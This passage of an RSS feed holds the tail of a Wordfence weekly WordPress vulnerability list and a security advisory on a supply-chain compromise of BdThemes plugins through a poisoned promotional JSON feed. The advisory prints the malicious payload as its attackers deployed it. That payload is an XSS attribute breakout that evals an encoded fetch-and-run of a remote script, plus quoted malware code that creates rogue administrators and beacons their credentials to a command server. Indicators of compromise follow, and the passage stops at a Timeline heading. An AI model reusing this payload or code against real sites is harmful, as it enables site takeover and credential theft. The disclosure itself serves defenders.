						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65543" target="_blank" rel="noopener noreferrer">							CVE-2026-65543						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/vimeo" target="_blank" rel="noopener">Vimeo</a> <span class="wfvr-software-slug">[vimeo]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xzenko" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xzenko" target="_blank" rel="noopener">0xzenko</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5d386d25-d228-4491-b58d-6adbb3b863a5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/40535215-9f82-4324-8b02-8f3e2ea82940" target="_blank" rel="noopener">WP Maps – Google Maps,OpenStreetMap,Mapbox,Store Locator,Listing,Directory &amp; Filters &lt;= 4.9.6 &#8211; Authenticated (Subscriber+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-28144" target="_blank" rel="noopener noreferrer">							CVE-2026-28144						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-google-map-plugin" target="_blank" rel="noopener">WP Maps – Google Maps,OpenStreetMap,Mapbox,Store Locator,Listing,Directory &amp; Filters</a> <span class="wfvr-software-slug">[wp-google-map-plugin]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/40535215-9f82-4324-8b02-8f3e2ea82940" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f490dd2b-34d6-4e19-8788-d30ad0c67e95" target="_blank" rel="noopener">WP Travel – Ultimate Travel Booking System, Tour Management Engine &lt; 11.8.1 &#8211; Authenticated (Subscriber+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13145" target="_blank" rel="noopener noreferrer">							CVE-2026-13145						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-travel" target="_blank" rel="noopener">WP Travel – Ultimate Travel Booking System, Tour Management Engine</a> <span class="wfvr-software-slug">[wp-travel]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f490dd2b-34d6-4e19-8788-d30ad0c67e95" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3d7a544b-73a1-4883-a2d2-df42de08ff08" target="_blank" rel="noopener">YayPricing &lt;= 3.5.6 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66442" target="_blank" rel="noopener noreferrer">							CVE-2026-66442						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/yaypricing" target="_blank" rel="noopener">YayPricing – WooCommerce Dynamic Pricing &amp; Discounts</a> <span class="wfvr-software-slug">[yaypricing]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/k-sorrachat" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1cc663e2f3efb377e8165cec61197c25.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1cc663e2f3efb377e8165cec61197c25"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/k-sorrachat" target="_blank" rel="noopener">K. Sorrachat</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3d7a544b-73a1-4883-a2d2-df42de08ff08" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/60c57b6c-4dc1-4fa6-bf14-7c5c74c704db" target="_blank" rel="noopener">ЮKassa для WooCommerce &lt;= 2.16.1 &#8211; Authenticated (Subscriber+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65434" target="_blank" rel="noopener noreferrer">							CVE-2026-65434						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/yookassa" target="_blank" rel="noopener">ЮKassa для WooCommerce</a> <span class="wfvr-software-slug">[yookassa]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/60c57b6c-4dc1-4fa6-bf14-7c5c74c704db" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e9c9214d-45d4-4477-8244-7802a4901114" target="_blank" rel="noopener">Media Cleaner: Clean your WordPress! &lt;= 7.0.3 &#8211; Authenticated (Administrator+) Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">4.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-4912" target="_blank" rel="noopener noreferrer">							CVE-2026-4912						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/media-cleaner" target="_blank" rel="noopener">Media Cleaner: Clean your WordPress!</a> <span class="wfvr-software-slug">[media-cleaner]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lukasz-sobanski" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/495f7dc5e65ef9d4606321be8446eb13.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="495f7dc5e65ef9d4606321be8446eb13"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lukasz-sobanski" target="_blank" rel="noopener">lucsob</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e9c9214d-45d4-4477-8244-7802a4901114" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div></div>
<hr>
<p><em>As a reminder, Wordfence has curated an industry leading vulnerability database with all known WordPress core, theme, and plugin vulnerabilities known as Wordfence Intelligence.</em></p>
<p>This database is continuously updated, maintained, and populated by Wordfence’s highly credentialed and experienced vulnerability researchers through in-house vulnerability research, vulnerability researchers submitting directly to us through our <a href="https://www.wordfence.com/threat-intel/bug-bounty-program/" target="_blank" rel="noopener">Bug Bounty Program</a>, and by monitoring varying sources to capture all publicly available WordPress vulnerability information and adding additional context where we can.</p>
<p><a href="https://www.wordfence.com/subscribe-to-the-wordfence-email-list/" target="_blank" rel="noopener">Click here to sign-up for our mailing list</a> to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.</p>
<p>The post <a href="https://www.wordfence.com/blog/2026/08/wordfence-intelligence-weekly-wordpress-vulnerability-report-august-3-2026-to-august-9-2026/" target="_blank" rel="noopener">Wordfence Intelligence Weekly WordPress Vulnerability Report (August 3, 2026 to August 9, 2026)</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>PSA: Supply Chain Compromise in BdThemes Ecosystem via Poisoned API Response</title>
		<link>https://swiftupdates.ca/psa-supply-chain-compromise-in-bdthemes-ecosystem-via-poisoned-api-response/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Sat, 08 Aug 2026 19:45:45 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/psa-supply-chain-compromise-in-bdthemes-ecosystem-via-poisoned-api-response/</guid>

					<description><![CDATA[The Wordfence Threat Intelligence Team was notified on August 7th, 2026 of a supply chain compromise affecting BdThemes, a WordPress plugin vendor whose plugins are available in the official WordPress plugins directory. Currently, all the affected plugins are temporarily closed pending a full inspection and ongoing investigation by the WordPress Plugins team. Our investigation revealed [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>The Wordfence Threat Intelligence Team was notified on August 7th, 2026 of a supply chain compromise affecting BdThemes, a WordPress plugin vendor whose plugins are available in the official WordPress plugins directory. Currently, all the affected plugins are temporarily closed pending a full inspection and ongoing investigation by the WordPress Plugins team.</p>
<p>Our investigation revealed an insidious supply chain compromise affecting several plugins. Unlike traditional software supply chain attacks, zero source code files were modified within the official WordPress.org repository. Instead, threat actors poisoned a static remote JSON data stream fetched by an administrative promotional banner component.</p>
<p>As part of our product lineup, we offer security monitoring and malware removal services to our <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a> and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Response</a> customers. In the event of a security incident, our incident response team will investigate the root cause, find and remove malware from your site, and help with other complications that may arise as a result of an infection. During the cleanup, malware samples are added to our Threat Intelligence database, which contains over 4.4 million unique malicious samples. The Wordfence plugin and Wordfence CLI scanner detect over 99% of these samples and indicators of compromise, when using the premium signatures set. <a href="https://www.wordfence.com/products/wordfence-cli/" target="_blank" rel="noopener">Wordfence CLI</a> can scan your site even if WordPress is no longer functional and is an excellent layer of security to implement at the server-level, part of our mission to secure the web by Defense in Depth.</p>
<p> </p>
<h3>Vulnerability Summary from Wordfence Intelligence</h3>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7bf1d6f9-afe2-41c2-968b-20dbc474cd73" target="_blank" rel="noopener">Biggopti Library (Various Versions) &#8211; Cross-Site Scripting via display_id from Sigmative API</a></h4>
<div class="cvss-score-badge">5.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.4 (Medium)</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bdthemes-element-pack-lite" target="_blank" rel="noopener">Element Pack Addons for Elementor – Elementor Widgets, Elementor Templates, Elementor Addons</a> <span class="wfvr-software-slug">[bdthemes-element-pack-lite]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/live-copy-paste" target="_blank" rel="noopener">Live Copy Paste for Elementor – Cross Domain Copy Paste &amp; Page Duplicator</a> <span class="wfvr-software-slug">[live-copy-paste]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pixel-gallery" target="_blank" rel="noopener">Pixel Gallery Addons for Elementor – Easy Grid, Creative Gallery, Drag and Drop Grid, Custom Grid Layout, Portfolio Gallery</a> <span class="wfvr-software-slug">[pixel-gallery]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bdthemes-prime-slider-lite" target="_blank" rel="noopener">Prime Slider Addons for Elementor – Widgets, Templates &amp; Elementor Addons</a> <span class="wfvr-software-slug">[bdthemes-prime-slider-lite]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/smart-admin-assistant" target="_blank" rel="noopener">Smart Admin Assistant – Dashboard and Site Enhancements</a> <span class="wfvr-software-slug">[smart-admin-assistant]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-post-kit" target="_blank" rel="noopener">Ultimate Post Kit Addons for Elementor</a> <span class="wfvr-software-slug">[ultimate-post-kit]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-store-kit" target="_blank" rel="noopener">Ultimate Store Kit – Addon For WooCommerce, EDD and Elementor</a> <span class="wfvr-software-slug">[ultimate-store-kit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
									<strong>Researcher(s):</strong> Unknown
							</div>
</p></div>
<div class="vulnerability-description">
			The Biggop Library is vulnerable to Cross-Site Scripting via the ‘display_id’ parameter from the Sigmative API in various versions due to insufficient output escaping. This makes it possible for attackers who can compromise the Sigmative API server to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.		</div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7bf1d6f9-afe2-41c2-968b-20dbc474cd73" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<p> </p>
<h3>Technical Analysis</h3>
<p>BdThemes plugins ship with a component called <em>Biggopti</em>, an internal system that pulls promotional banners from their API server and renders them in the WordPress admin dashboard. The API is backed by a static DigitalOcean Spaces bucket protected by Cloudflare. It isn’t a dynamic application server: it’s flat JSON files served from object storage.</p>
<p>A cross-site scripting (XSS) vulnerability was introduced by the plugin authors in the JSON response parsing code; rogue actors obtained write access to that bucket replacing the legitimate JSON responses with crafted payloads to exploit that vulnerability. The XSS fires inside every logged-in admin’s browser, silently, on every wp-admin page load. From there, the injected script creates rogue administrator accounts, uploads a webshell plugin, and phones home to a command-and-control (C2) server.</p>
<p>No plugin update is required to become a victim. No file is modified on disk. The attack is entirely API-driven, invisible to file-based integrity scanners and barely visible to Web Application Firewalls.</p>
<p> </p>
<h4>XSS Vulnerability Exposed To Administrators</h4>
<p>Every BdThemes plugin utilizing the <i>Biggopti</i> system enqueues a client-side JavaScript asset on <code>admin_init</code>, causing it to execute unconditionally on every single wp-admin page load. This script fetches promotional banner data from the vendor’s API endpoint.  When the script constructs the HTML notice container in the Document Object Model (DOM), it concatenates the <code>display_id</code> field from the remote JSON response directly into an HTML <code>id</code> attribute without client-side escaping:</p>
<pre class="brush: jscript; title: ; notranslate">
// unescaped
var f = t.display_id || t.id || "default";

// injected in DOM
var m = "bdt-admin-biggopti-api-biggopti-" + f;
A = 'id="' + m + '"';                          
</pre>
<p>What appears to be an oversight is proven later in the same code, where the <code>data-display-id</code> attribute is properly escaped, albeit with a convoluted structure that might be the outcome of minification/bundling:</p>
<pre class="brush: jscript; title: ; notranslate">
var e = function(t) { return p(t) };
function p(t){return(t||"").replace(/&amp;/g,"&amp;amp;").replace(/&lt;/g,"&amp;lt;").replace(/&gt;/g,"&amp;gt;").replace(/"/g,"&amp;quot;")}
// [...]
A += ' data-display-id="' + e(f) + '"'
</pre>
<p>SVN commit history reveals this unescaped attribute injection was introduced on March 1st, 2026, in <i>Prime Slider</i> (bdthemes-prime-slider-lite) version 4.1.9 and then applied to other plugins. While later releases introduced a DOMParser-based sanitizer for the banner’s content field (stripping dangerous HTML tags and inline handlers) the <code>id</code> attribute injection remained unescaped.</p>
<p>An unauthorized actor with write access to the vendor’s storage bucket replaced legitimate JSON responses with crafted payloads. The injected <code>display_id</code> breaks out of the <code>id</code> attribute and inserts an <code>onanimationstart</code> event handler triggered by a CSS animation within 10 milliseconds, firing silently whenever an administrator loads any dashboard page.</p>
<p>Excerpt from the API response (still served at the time of writing):</p>
<p><code><br />
{"biggopti_class": "class-01kvw52snnwd7r8ge9aj80xnsw", "id": "1_01kvw52snnwd7r8ge9aj80xnsw_1784784572", "display_id": "SAFE\" onanimationstart=eval(String.fromCharCode(102,101,116,99,104,40,39,104,116,116,112,115,58,47,47,97,112,105,46,115,105,103,109,97,116,105,118,101,46,105,111,47,112,114,111,100,47,115,116,111,114,101,47,97,112,105,47,98,105,103,103,111,112,116,105,47,120,46,106,115,63,95,61,49,39,41,46,116,104,101,110,40,114,61,62,114,46,116,101,120,116,40,41,41,46,116,104,101,110,40,116,61,62,110,101,119,32,70,117,110,99,116,105,111,110,40,116,41,40,41,41)) style=animation:wrapperSlideInTop .01s ease-out both", "type": "adminDashboard", "title": "Build more. Pay less. This Summer",<br />
</code></p>
<p> </p>
<h4><b>Multi-Stage Multi-Payload Architecture</b></h4>
<p>The injected event handler initiates a multi-stage compromise by fetching external scripts based on the availability of the attacker’s infrastructure.</p>
<h5>Primary Payload (w2.js)</h5>
<p>The main payload is served to plugins using the <code>api-data-all-records</code> API endpoint. When <code>w2.js</code> executes within the authenticated administrator’s session, it performs the following sequence:</p>
<ol>
<li><b>C2 Verification:</b> It contacts the C2 server at <code>ia-cdn[.]com/fz/c</code> with the victim website’s origin to receive targeting instructions, aborting if the C2 returns a “skip” or “done” status.</li>
<li><b>Rogue Administrative Account Creation:</b> Using <code>X-WP-Nonce</code> present in the active admin session, it creates a new administrator via the WordPress REST API, with fallback to standard form submissions.</li>
<li><b>Webshell Installation:</b> It downloads a fake plugin ZIP from the C2 server and installs it via the standard plugin upload form. Disguised under the slug <code>wp-smart-thumbnails</code> or similar neutral-sounding slugs, this fake plugin contains a webshell named <code>emer-run.php</code> that is invoked directly by URL.</li>
<li><b>Must-Use (MU) Plugin Backdoors:</b> Invoking <code>emer-run.php</code> installs two persistence modules into the Must-Use plugins directory. Both samples we obtained were backdated to September 2025 to blend with legitimate filesystem timestamps (filenames might change across infections). The first module is a magic-login backdoor allowing unauthenticated administrative entry via a URL parameter (<code>?_wplogin=&lt;token&gt;</code>), targeting the site’s longest-registered administrator. The second module is an anti-analysis stealth module that hooks into WordPress database queries to hide the created rogue accounts from the administrative user list and decrement total user counts accordingly.</li>
<li><b>Exfiltration:</b> All execution phase results are sent back to the C2 server via <code>navigator.sendBeacon</code>.</li>
</ol>
<h5>Alternate Payload (x.js)</h5>
<p>The secondary script is found hosted directly on BdThemes’ infrastructure and is served to victims plugins using the <code>api-data-records</code> API endpoint. It generates deterministic administrative credentials mathematically derived from the victim website’s hostname.</p>
<pre class="brush: jscript; title: ; notranslate">
function makeCreds(){
  var host=siteKey();
  var hash=0;
  for(var i=0;i&lt;host.length;i++){hash=((hash&lt;&lt;5)-hash+host.charCodeAt(i))|0;}
  var n=Math.abs(hash).toString(36).slice(0,6);
  var user='bd_'+n;
  var pass='Bd@26!'+n+'x';
  return {user:user,pass:pass};
}
</pre>
<p> </p>
<p>This algorithm produces predictable usernames (<code>bd_</code> followed by a 6-character base36 hash) and passwords (<code>Bd@26!</code> followed by the hash and x), pairing them with an <code>@wordpress.org</code> email address. Because the credentials are deterministic, threat actors do not need to store compromised site lists centrally, and incident responders can compute the exact username and password to hunt for on suspected domains.</p>
<p>The generated credentials are then used to create a rogue admin user, exfiltrating the outcome to the C2 server while saving a localStorage flag (when available) on the victim’s browser:</p>
<pre class="brush: jscript; title: ; notranslate">
function beacon(qs){
  try{var b=new Blob([qs],{type:'application/x-www-form-urlencoded'});if(navigator.sendBeacon&amp;&amp;navigator.sendBeacon(C,b))return;}catch(e){}
  try{fetch(C,{method:'POST',body:qs,headers:{'Content-Type':'application/x-www-form-urlencoded'},credentials:'omit',mode:'no-cors',keepalive:true});}catch(e2){}
}
function reportAdmin(st,user,pass,lu){ 
  beacon('xa=admin&amp;status='+euc(st)+'&amp;au='+euc(user)+'&amp;ap='+euc(pass)+'&amp;site='+euc(getOrigin())+'&amp;lu='+euc(lu)+'&amp;u='+euc(pageUrl()));
}

function modAdmin(){
  var creds=makeCreds();
  var user=creds.user,pass=creds.pass,lu='';
  return fetch('/wp-admin/user-new.php',{credentials:'same-origin'}).then(function(r){return r.text();}).then(function(html){
    var lm=html.match(/href=["']([^"']*?)?action=logout/);if(lm)lu=lm[1];
    var n=findNonce(html);if(!n){reportAdmin('nonce_missing',user,pass,lu);return;}
    var b='action=createuser&amp;_wpnonce_create-user='+n+'&amp;user_login='+user+'&amp;email='+user+'%40wordpress.org&amp;pass1='+euc(pass)+'&amp;pass2='+euc(pass)+'&amp;role=administrator&amp;createuser=Add+New+User';
    return fetch('/wp-admin/user-new.php',{method:'POST',credentials:'same-origin',headers:{'Content-Type':'application/x-www-form-urlencoded'},body:b,redirect:'manual'}).then(function(r){
      try{localStorage.setItem(DONE_KEY,'1');}catch(e){}
      if(r.type==='opaqueredirect'||r.status===302||r.status===301){reportAdmin('created',user,pass,lu);return;}
      if(r.ok)return r.text().then(function(t){
        var exists=/already exists|username.*taken/i.test(t);
        reportAdmin(exists?'exists':'created',user,pass,lu);
      });
      reportAdmin('fail',user,pass,lu);
    });
  }).catch(function(e){reportAdmin('err',creds.user,creds.pass,'');});
}
try{if(localStorage.getItem(DONE_KEY))return;}catch(e){}
modAdmin();
}
</pre>
<p> </p>
<h3>Threat Actors &amp; Scope</h3>
<p>The C2 domain is related to the same threat actors behind both the <a href="https://www.wordfence.com/blog/2026/07/wordfence-prism-detected-backdoored-wordpress-plugin-within-two-hours-of-it-being-introduced/" target="_blank" rel="noopener">Advanced Responsive Video Embedder</a> and the <a href="https://optinmonster.com/security-incident-tampered-script-served-via-optinmonster-and-trustpulse/#what-to-check-and-do" target="_blank" rel="noopener">OptinMonster</a> supply chain attacks that happened in the last two months.</p>
<p>The primary objective of this campaign is widespread, silent administrative persistence and remote code execution across millions of WordPress environments. This supply chain compromise is particularly insidious because it didn’t require any access to websites, poisoning a simple promotional feed was enough to exploit a vulnerability in the underlying display code.</p>
<p>The fact that malicious JSON records and the secondary <code>x.js</code> payload were uploaded directly into the vendor’s own bucket indicates a severe upstream compromise of BdThemes’ cloud storage credentials or internal infrastructure.</p>
<p> </p>
<h3>Indicators of Compromise (IoCs)</h3>
<h4>Affected Plugins</h4>
<ul>
<li>Element Pack Addons for Elementor<code>(bdthemes-element-pack-lite)</code></li>
<li>Prime Slider Addons for Elementor<code>(bdthemes-prime-slider-lite)</code></li>
<li>Pixel Gallery Addons for Elementor<code>(pixel-gallery)</code></li>
<li>Ultimate Post Kit Addons for Elementor<code>(ultimate-post-kit)</code></li>
<li>Ultimate Store Kit – Addon For WooCommerce, EDD and Elementor<code>(ultimate-store-kit)</code></li>
<li>Live Copy Paste for Elementor (<code>live-copy-paste</code>)</li>
<li>Smart Admin Assistant (<code>smart-admin-assistant</code>)</li>
</ul>
<h4>External Resources</h4>
<ul>
<li><b>Primary Payload URL:</b> <code>ia-cdn[.]com/fz/w2.js</code></li>
<li><b>C2 Beacon Endpoint:</b> <code>ia-cdn[.]com/fz/c</code></li>
<li><b>Poisoned Vendor API Endpoints (now cleaned):</b>
<ul>
<li><code>api[.]sigmative[.]io/prod/store/api/biggopti/api-data-all-records</code></li>
<li><code>api[.]sigmative[.]io/prod/store/api/biggopti/api-data-records</code></li>
<li><code>api[.]sigmative[.]io/prod/store/api/biggopti/x.js</code></li>
</ul>
</li>
</ul>
<h4>Filesystem &amp; Database</h4>
<ul>
<li><b>Webshell File:</b> <code>emer-run.php</code> (md5: <code>1024732009983dd5e54b4cf5593f04d4)</code></li>
<li><b>MU-Plugin Magic Login Backdoor:</b> <code>class-wp-token-validate.php</code> (md5: <code>7719cd98a35ffad2771f26d1ceab7d27)</code></li>
<li><b>MU-Plugin Stealth Module:</b> <code>class-wp-query-9d127ff3.php</code> (or similar class-wp-query-*.php naming. md5: <code>9aadc3e5c5242b273bd17c5bdc358845</code>)</li>
<li><b>MU-Plugin “Health Check” Module:</b> <code>wp-cache-optimizer.php</code> (md5: <code>e450ae5bc4bfc0d960dded06a76bb8e9</code>)</li>
<li><strong>Database option:</strong> <code>fz_emer_login_tokens</code> (Stores magic login tokens)</li>
<li><strong>Database option: </strong><code>fz_emer_done_v1</code> (Flag indicating completed compromise)</li>
<li>Accounts utilizing <code>@wordpress.org</code> or <code>@developer.wordpress.org</code> domains.</li>
<li>Usernames matching <code>bd_</code> + 6 alphanumeric characters.</li>
</ul>
<h2>Timeline</h2>
<ul>
